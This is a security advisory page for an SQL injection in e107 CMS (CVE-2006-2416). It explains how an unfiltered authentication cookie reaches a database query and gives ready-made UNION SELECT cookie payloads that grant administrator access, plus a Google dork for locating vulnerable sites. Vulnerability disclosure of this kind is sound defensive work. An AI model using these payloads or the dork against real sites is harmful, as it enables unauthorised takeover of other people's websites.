Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityAlert

  Topic : SQL-Injection in e107 allows attacker to become a site admininstrator
  SecurityAlert : 905
  CVE : CVE-2006-2416
  SecurityRisk : Medium  alert  (About)
  Remote Exploit : Yes
  Local Exploit : No
  Exploit Given : Yes
  Credit : socsam
  Published : 18.05.2006

  Affected Software : e107 (CMS) x <= 0.7.2



  Advisory Text :  

Software: e107 (CMS)

Versions: <= 0.7.2

Type: SQL-injection

Homepage: www.e107.org

Description:

----------------------------

SQL-Injection in e107 allows attacker to become a site admininstrator.

Requirements:

----------------------------

Magic_quotes_gpc = Off

Vulnerability:

----------------------------

Vulnerability has been found in processing the COOKIE.

COOKIE use for authentification users and administrator.

Data transfered to this parameter not are filtered.

Code:

----------------------------

class2.php

.....

> list($uid, $upw)=($_COOKIE[$pref['cookie_name']] ? explode(".",
> $_COOKIE[$pref['cookie_name']]) : explode(".",
$_SESSION[$pref['cookie_name']]));

.....

> if($result = get_user_data($uid, "AND
md5(u.user_password)='{$upw}'", FALSE)) {

.....

Exploit:

0.6.xxx

1.blabla_hash_password' union select * from e107_user where user_id=1/*

0.7.X

1.blabla_hash_password' union select
1,'admin_d','admin',4,5,6,'some_user@some_hostcom',8,9,10,11,12,'1139995
361','1140005365',15,16,17,18,19,20,21,22,23,24,'1',26,27,'0',29,30,31,3
2,33 /*

Additional Information:

-----------------------

Google dorks: "Powered by e107"

Vendor Status

-------------

The vendor is informed!




  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Microsoft VISTA TCP/IP stack buffer overflow

high- 2008-11-27

Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.

Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability

PHP rss

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

» PHP 5.2.6 (error_log)
   safe_mode bypass

Copyright © SecurityReason. All Rights Reserved.